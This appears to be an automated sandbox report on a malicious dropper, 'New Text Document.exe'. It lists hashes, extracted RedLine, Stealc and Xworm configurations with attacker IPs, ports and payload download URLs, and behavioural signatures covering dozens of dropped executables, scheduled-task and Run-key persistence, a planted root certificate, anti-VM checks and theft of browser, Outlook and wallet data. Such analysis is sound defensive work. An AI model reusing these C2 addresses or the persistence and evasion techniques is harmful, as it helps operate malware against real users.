Resubmissions
09-04-2024 13:27
240409-qqa5hsbd5t 1009-04-2024 13:27
240409-qp978abd5s 1009-04-2024 13:27
240409-qp9lpabd4y 1009-04-2024 13:27
240409-qp9axsgb32 1018-11-2023 14:44
231118-r4d9rsef94 10Analysis
-
max time kernel
130s -
max time network
258s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-04-2024 13:27
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document.exe
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
New Text Document.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
New Text Document.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
New Text Document.exe
Resource
win11-20240221-en
Errors
General
-
Target
New Text Document.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe
Extracted
redline
6077866846
https://pastebin.com/raw/KE5Mft0T
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
xworm
94.156.8.213:58002
127.0.0.1:18356
t-brave.gl.at.ply.gg:18356
-
Install_directory
%Public%
-
install_file
svchost.exe
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000700000001ac17-412.dat family_xworm behavioral2/files/0x000700000001ac20-2642.dat family_xworm -
Process spawned unexpected child process 51 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1304 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 956 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4304 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5148 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 900 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4480 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3528 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4208 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5856 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5260 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5248 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2068 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5508 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 652 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2312 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5140 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2332 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 652 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5612 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4912 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2480 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5596 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5464 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 296 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3092 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4500 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5076 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 308 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5268 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5292 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1116 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5592 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4588 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4232 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5188 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5764 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5236 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5580 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2224 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5092 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4412 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5748 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5572 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6124 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4172 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5464 4736 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 4736 schtasks.exe 82 -
Quasar payload 1 IoCs
resource yara_rule behavioral2/files/0x000700000001ac92-4840.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2936-83-0x0000000000110000-0x0000000000132000-memory.dmp family_redline -
resource yara_rule behavioral2/files/0x000700000001ac9c-4867.dat dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mQxBvlTA.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 46 4304 RuntimeBroker2.exe 58 4304 RuntimeBroker2.exe 119 296 ISetup5.exe 125 296 ISetup5.exe 127 296 ISetup5.exe 130 296 ISetup5.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mQxBvlTA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mQxBvlTA.exe -
Executes dropped EXE 54 IoCs
pid Process 2364 cccc.exe 4128 mQxBvlTA.exe 2408 xIPJVPDq.exe 2796 jIsBEpHW.exe 2936 crypted6077866846MVYQY.exe 4908 i1gcbW1E.exe 2244 wininit.exe 4104 1234.exe 5080 ISetup8.exe 5088 test2.exe 5004 u3x4.0.exe 3108 1111.exe 3016 ISetup2.exe 2648 Tester.exe 988 svchost.exe 3168 u2bs.0.exe 4304 RuntimeBroker2.exe 1392 svchost.exe 1352 555.exe 4172 Document.exe 5028 BrawlB0t.exe 4896 medcallaboratory5.exe 1808 securitycheck.exe 2860 PrintSpoofer.exe 2928 Adobe_update.exe 4652 Document.exe 380 msdtc.exe 4264 OneDrive.exe 352 Retailer_prog.exe 2336 BroomSetup.exe 1892 msdtc.exe 1716 msdtc.exe 4992 msdtc.exe 3264 alexxxxxxxx.exe 200 syncUpd.exe 284 Ledger-Live.exe 1892 propro.exe 1588 Traffic.exe 2728 1111.exe 3168 new1.exe 240 swiiii.exe 296 ISetup5.exe 5324 mstsc.exe 5548 u88.0.exe 5640 Jufrxnb.exe 5664 crypted_097f1784.exe 5876 u88.1.exe 6004 june.exe 6028 Jufrxnb.exe 5176 june.tmp 5436 crypted_33cb9091.exe 5544 sunvox32.exe 5712 sunvox32.exe 5328 Jufrxnb.exe -
Loads dropped DLL 5 IoCs
pid Process 5176 june.tmp 5176 june.tmp 5176 june.tmp 656 RegAsm.exe 656 RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000800000001ac01-42.dat themida behavioral2/files/0x000800000001ac01-41.dat themida behavioral2/memory/4128-105-0x0000000000300000-0x000000000141C000-memory.dmp themida behavioral2/memory/4128-112-0x0000000000300000-0x000000000141C000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook RuntimeBroker2.exe Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe Key opened \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mQxBvlTA.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: Jufrxnb.exe File opened (read-only) \??\G: Jufrxnb.exe File opened (read-only) \??\M: Jufrxnb.exe File opened (read-only) \??\N: Jufrxnb.exe File opened (read-only) \??\P: Jufrxnb.exe File opened (read-only) \??\V: Jufrxnb.exe File opened (read-only) \??\H: Jufrxnb.exe File opened (read-only) \??\W: Jufrxnb.exe File opened (read-only) \??\X: Jufrxnb.exe File opened (read-only) \??\B: Jufrxnb.exe File opened (read-only) \??\I: Jufrxnb.exe File opened (read-only) \??\T: Jufrxnb.exe File opened (read-only) \??\Z: Jufrxnb.exe File opened (read-only) \??\J: Jufrxnb.exe File opened (read-only) \??\K: Jufrxnb.exe File opened (read-only) \??\L: Jufrxnb.exe File opened (read-only) \??\O: Jufrxnb.exe File opened (read-only) \??\Q: Jufrxnb.exe File opened (read-only) \??\R: Jufrxnb.exe File opened (read-only) \??\S: Jufrxnb.exe File opened (read-only) \??\U: Jufrxnb.exe File opened (read-only) \??\Y: Jufrxnb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 12 raw.githubusercontent.com 13 raw.githubusercontent.com 15 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 47 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000700000001ac08-165.dat autoit_exe behavioral2/files/0x000700000001ac21-3149.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4128 mQxBvlTA.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 4896 set thread context of 3748 4896 medcallaboratory5.exe 116 PID 2928 set thread context of 3704 2928 Adobe_update.exe 124 PID 4172 set thread context of 4652 4172 Document.exe 141 PID 380 set thread context of 4992 380 msdtc.exe 162 PID 3264 set thread context of 3864 3264 alexxxxxxxx.exe 168 PID 240 set thread context of 656 240 swiiii.exe 184 PID 5664 set thread context of 5964 5664 crypted_097f1784.exe 193 PID 5436 set thread context of 5932 5436 crypted_33cb9091.exe 205 -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe mstsc.exe File created C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe mstsc.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\svchost.exe Tester.exe File opened for modification C:\Windows\svchost.exe Tester.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 756 sc.exe 5448 sc.exe 4452 sc.exe 4628 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 4460 2928 WerFault.exe 122 4088 2728 WerFault.exe 177 5984 5664 WerFault.exe 190 5948 5436 WerFault.exe 198 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u88.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u88.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u88.1.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u3x4.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u3x4.0.exe -
Creates scheduled task(s) 1 TTPs 59 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2312 schtasks.exe 5268 schtasks.exe 5592 schtasks.exe 4292 schtasks.exe 4412 schtasks.exe 312 schtasks.exe 4304 schtasks.exe 4232 schtasks.exe 2224 schtasks.exe 6124 schtasks.exe 4912 schtasks.exe 5076 schtasks.exe 1116 schtasks.exe 5580 schtasks.exe 4172 schtasks.exe 1004 schtasks.exe 2632 schtasks.exe 2440 schtasks.exe 5140 schtasks.exe 5596 schtasks.exe 956 schtasks.exe 3528 schtasks.exe 5508 schtasks.exe 652 schtasks.exe 5236 schtasks.exe 5856 schtasks.exe 4208 schtasks.exe 5612 schtasks.exe 4588 schtasks.exe 5764 schtasks.exe 2988 schtasks.exe 920 schtasks.exe 900 schtasks.exe 5260 schtasks.exe 296 schtasks.exe 2780 schtasks.exe 4480 schtasks.exe 2332 schtasks.exe 5464 schtasks.exe 5188 schtasks.exe 5464 schtasks.exe 1988 schtasks.exe 2068 schtasks.exe 2480 schtasks.exe 308 schtasks.exe 652 schtasks.exe 4500 schtasks.exe 5092 schtasks.exe 5748 schtasks.exe 5572 schtasks.exe 2672 schtasks.exe 5292 schtasks.exe 3092 schtasks.exe 1304 schtasks.exe 5148 schtasks.exe 5248 schtasks.exe 5856 schtasks.exe 5292 schtasks.exe 2364 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2268 timeout.exe 268 timeout.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie Jufrxnb.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2724 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2364 cccc.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 2408 xIPJVPDq.exe 2408 xIPJVPDq.exe 2408 xIPJVPDq.exe 2408 xIPJVPDq.exe 2796 jIsBEpHW.exe 2796 jIsBEpHW.exe 2936 crypted6077866846MVYQY.exe 2796 jIsBEpHW.exe 2796 jIsBEpHW.exe 2936 crypted6077866846MVYQY.exe 2936 crypted6077866846MVYQY.exe 2936 crypted6077866846MVYQY.exe 2936 crypted6077866846MVYQY.exe 2936 crypted6077866846MVYQY.exe 5004 u3x4.0.exe 5004 u3x4.0.exe 2936 crypted6077866846MVYQY.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 2648 Tester.exe 3740 powershell.exe 3740 powershell.exe 3740 powershell.exe 1392 powershell.exe 280 powershell.exe 280 powershell.exe 280 powershell.exe 280 powershell.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 3748 RegSvcs.exe 3748 RegSvcs.exe 1808 securitycheck.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 4312 powershell.exe 4312 powershell.exe 4312 powershell.exe -
